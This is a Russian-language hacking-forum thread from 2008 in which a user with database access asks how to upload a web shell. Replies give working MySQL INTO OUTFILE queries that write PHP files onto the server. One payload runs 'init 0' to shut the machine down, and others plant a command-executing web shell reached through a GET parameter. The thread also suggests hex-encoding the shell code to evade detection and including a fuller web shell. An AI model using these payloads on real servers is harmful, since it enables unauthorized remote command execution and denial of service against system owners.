ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Перезагрузить страницу Шелл через MySQL
   
Закрытая тема
 
Опции темы Поиск в этой теме Опции просмотра

Шелл через MySQL
  #1  
Старый 14.05.2008, 04:50
~Taxa~
Новичок
Регистрация: 24.01.2008
Сообщений: 20
Провел на форуме:
39650

Репутация: 15
Exclamation Шелл через MySQL
Вот столкнулся с тем, что есть доступ к базе данных. То есть я конекчусь через RST MySQL скрипт к базе, могу удалять, создавать таблицы и т.д. Но мне надо залить шелл, если какие нибудь способы?
 

  #2  
Старый 14.05.2008, 09:07
SKAZ0CHN1k
Новичок
Регистрация: 08.02.2008
Сообщений: 8
Провел на форуме:
32499

Репутация: 2
По умолчанию
Есть
Создаем допустим таблицу, в какое нить поле помещаем что-нить типа:
<?
system ('init 0'); // или любой производный код.
?>

SELECT поле INTO OUTFILE "/www/index2.php"
FROM таблица;

После выполнения запроса формируется файл в указанной дирректории с данными из таблицы
 

  #3  
Старый 14.05.2008, 09:09
SKAZ0CHN1k
Новичок
Регистрация: 08.02.2008
Сообщений: 8
Провел на форуме:
32499

Репутация: 2
По умолчанию
правда там нада разобраться с экранированием символов, типа
SELECT поле INTO OUTFILE "/www/index2.php"
FIELDS TERMINATED BY ',' OPTIONALLY ENCLOSED BY '"'
LINES TERMINATED BY "\n"
FROM таблица;
// ну эт просто пример...
 

  #4  
Старый 14.05.2008, 09:37
_Pantera_
Участник форума
Регистрация: 06.10.2006
Сообщений: 226
Провел на форуме:
3025546

Репутация: 1327
Отправить сообщение для _Pantera_ с помощью ICQ
По умолчанию
create table `lamak` (`phpcod` text not null);
insert into `lamak` (`phpcod`) values ('<? system($_GET[cmd]);?>');
select phpcod from `lamak` into outfile '/tmp/shell.php';
drop table `lamak`;

Только мой тебе совет, гет не используй, лучше поставь инклуд на нормальный веб-шелл.
 

  #5  
Старый 14.05.2008, 11:31
Grey
AMA - Level 2
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503

Репутация: 5826


По умолчанию
Цитата:
Сообщение от _Pantera_  
create table `lamak` (`phpcod` text not null);
insert into `lamak` (`phpcod`) values ('<? system($_GET[cmd]);?>');
select phpcod from `lamak` into outfile '/tmp/shell.php';
drop table `lamak`;

Только мой тебе совет, гет не используй, лучше поставь инклуд на нормальный веб-шелл.
Хм, зачем создавать таблицу, запихивать в неё код шелла, затем выводить это все в файл, получая шелл, а затем удалять таблицу?

На много проще будет сразу записать данные в файл:

Код:
select '<?php system($_GET["cmd"]); ?>' into outfile '/home/www/ .... /shell.php'
Только код шелла советую предварительно запихивать в хексы.

А вообще поиск юзать нужно перед созданием темы - обсуждалось и не раз.
 
Закрытая тема



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Заливаем шелл через PsychoStats AFoST Авторские статьи 29 02.04.2010 22:13
Эффективные Слепые Иньекции Евгений Минаев Авторские статьи 10 31.05.2008 09:43
Общие Рекомендации Защиты (MySQL и SQL Web-интерфейс) k00p3r Чужие Статьи 0 13.06.2005 11:22
Защищаем MySql. Шаг за шагом k00p3r Чужие Статьи 0 13.06.2005 11:18



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ